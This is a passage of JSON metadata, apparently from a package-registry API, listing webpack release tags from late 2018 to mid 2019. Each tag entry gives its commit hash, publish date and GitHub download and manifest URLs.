0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg